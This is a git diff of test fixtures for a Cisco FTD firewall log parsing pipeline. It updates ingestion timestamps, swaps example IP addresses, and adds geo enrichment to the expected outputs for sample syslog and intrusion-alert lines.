100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json @@ -31,7 +31,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.767202337Z", + "ingested": "2021-12-09T13:33:00.751642700Z", "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-07-19T09:06:46.767208026Z", + "ingested": "2021-12-09T13:33:00.751651600Z", "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json index 5245c8d8a86..60dcd209115 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json @@ -29,7 +29,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853583009Z", + "ingested": "2021-12-09T13:33:00.917237300Z", "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -66,7 +66,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853589347Z", + "ingested": "2021-12-09T13:33:00.917245300Z", "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00", "code": "" }, @@ -103,7 +103,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853591547Z", + "ingested": "2021-12-09T13:33:00.917254100Z", "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00", "code": "" }, @@ -140,7 +140,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853593458Z", + "ingested": "2021-12-09T13:33:00.917259700Z", "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00", "code": "" }, @@ -177,7 +177,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853595280Z", + "ingested": "2021-12-09T13:33:00.917265Z", "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00", "code": "" }, @@ -214,7 +214,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853597076Z", + "ingested": "2021-12-09T13:33:00.917270200Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00", "code": "" }, @@ -251,7 +251,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853598889Z", + "ingested": "2021-12-09T13:33:00.917275600Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00", "code": "" }, @@ -288,7 +288,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853600685Z", + "ingested": "2021-12-09T13:33:00.917280800Z", "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -325,7 +325,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853602476Z", + "ingested": "2021-12-09T13:33:00.917286100Z", "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00", "code": "" }, @@ -362,7 +362,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853604314Z", + "ingested": "2021-12-09T13:33:00.917291400Z", "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00", "code": "" }, @@ -399,7 +399,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853606120Z", + "ingested": "2021-12-09T13:33:00.917296700Z", "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, @@ -436,7 +436,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853608336Z", + "ingested": "2021-12-09T13:33:00.917302400Z", "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, @@ -473,7 +473,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853610246Z", + "ingested": "2021-12-09T13:33:00.917307900Z", "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00", "code": "" }, @@ -510,7 +510,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853612079Z", + "ingested": "2021-12-09T13:33:00.917313200Z", "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -547,7 +547,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853613918Z", + "ingested": "2021-12-09T13:33:00.917318400Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, @@ -584,7 +584,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853615727Z", + "ingested": "2021-12-09T13:33:00.917323700Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, @@ -621,7 +621,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853617781Z", + "ingested": "2021-12-09T13:33:00.917329100Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -658,7 +658,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853619586Z", + "ingested": "2021-12-09T13:33:00.917334500Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, @@ -695,7 +695,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853621387Z", + "ingested": "2021-12-09T13:33:00.917339800Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, @@ -732,7 +732,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853623212Z", + "ingested": "2021-12-09T13:33:00.917345100Z", "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -769,7 +769,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853625051Z", + "ingested": "2021-12-09T13:33:00.917350400Z", "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -806,7 +806,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853626919Z", + "ingested": "2021-12-09T13:33:00.917355800Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -843,7 +843,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853628745Z", + "ingested": "2021-12-09T13:33:00.917361100Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration Generation\u0000x0a\u0000x00", "code": "" }, @@ -880,7 +880,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853630717Z", + "ingested": "2021-12-09T13:33:00.917366500Z", "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -917,7 +917,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853632547Z", + "ingested": "2021-12-09T13:33:00.917371800Z", "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for siem-ftd\u0000x0a\u0000x00", "code": "" }, @@ -954,7 +954,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853634351Z", + "ingested": "2021-12-09T13:33:00.917377200Z", "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, @@ -991,7 +991,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853636151Z", + "ingested": "2021-12-09T13:33:00.917382500Z", "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00", "code": "" }, @@ -1028,7 +1028,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853637993Z", + "ingested": "2021-12-09T13:33:00.917387700Z", "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -1065,7 +1065,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853639810Z", + "ingested": "2021-12-09T13:33:00.917393Z", "original": "\u003c14\u003eAug 14 2019 14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1102,7 +1102,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853641619Z", + "ingested": "2021-12-09T13:33:00.917398300Z", "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1139,7 +1139,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853643431Z", + "ingested": "2021-12-09T13:33:00.917403600Z", "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1176,7 +1176,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853645258Z", + "ingested": "2021-12-09T13:33:00.917408900Z", "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1213,7 +1213,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853647100Z", + "ingested": "2021-12-09T13:33:00.917414200Z", "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00", "code": "" }, @@ -1251,7 +1251,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853648929Z", + "ingested": "2021-12-09T13:33:00.917419500Z", "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled", "code": "" }, diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json index a2c9706b551..d6e82f0cd2f 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json @@ -64,7 +64,7 @@ }, "event": { "severity": 0, - "ingested": "2021-07-19T09:06:48.155993511Z", + "ingested": "2021-12-09T13:33:02.768491200Z", "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -178,7 +178,7 @@ }, "event": { "severity": 0, - "ingested": "2021-07-19T09:06:48.155999980Z", + "ingested": "2021-12-09T13:33:02.768499400Z", "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -290,7 +290,7 @@ }, "event": { "severity": 0, - "ingested": "2021-07-19T09:06:48.156002100Z", + "ingested": "2021-12-09T13:33:02.768504900Z", "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -400,7 +400,7 @@ }, "event": { "severity": 0, - "ingested": "2021-07-19T09:06:48.156011291Z", + "ingested": "2021-12-09T13:33:02.768510300Z", "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json index d146bcd972b..adc27b67bf5 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:48.523888221Z", + "ingested": "2021-12-09T13:33:03.454300100Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt", "code": "430001", "kind": "alert", @@ -109,7 +109,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:48.523894630Z", + "ingested": "2021-12-09T13:33:03.454308200Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).", "code": "430001", "kind": "alert", @@ -167,7 +167,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:48.523896846Z", + "ingested": "2021-12-09T13:33:03.454313700Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:", "code": "430002", "kind": "event", @@ -243,7 +243,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:48.523898756Z", + "ingested": "2021-12-09T13:33:03.454319Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311", "code": "430005", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log index 2742be4b533..ca647162cfc 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log @@ -1,3 +1,3 @@ -<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -> OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000] +<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -> OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000] Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233 Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json index 9df94700793..f31faf15512 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json @@ -5,9 +5,27 @@ "level": "notification" }, "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", "port": 53, - "address": "203.0.113.42", - "ip": "203.0.113.42" + "ip": "81.2.69.144" }, "syslog": { "facility": { @@ -16,8 +34,8 @@ }, "source": { "port": 27218, - "address": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244", - "domain": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "address": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244", + "domain": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" }, "tags": [ "preserve_original_event" @@ -47,16 +65,16 @@ }, "related": { "hosts": [ - "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" ], "ip": [ - "203.0.113.42" + "81.2.69.144" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.766885781Z", - "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -\u003e OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:33:03.880922800Z", + "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -120,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.766891794Z", + "ingested": "2021-12-09T13:33:03.880928800Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -202,7 +220,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.766893926Z", + "ingested": "2021-12-09T13:33:03.880933800Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log index 09da866b488..663de2ad75a 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log @@ -1,71 +1,71 @@ -Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] -Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834 -Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882 -Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392 -Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) -Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 -Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 +Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] +Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834 +Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882 +Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392 +Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) +Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 +Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233 -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879 -Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) -Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query -Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.0.0.88(40443) hit-cnt 1 first hit 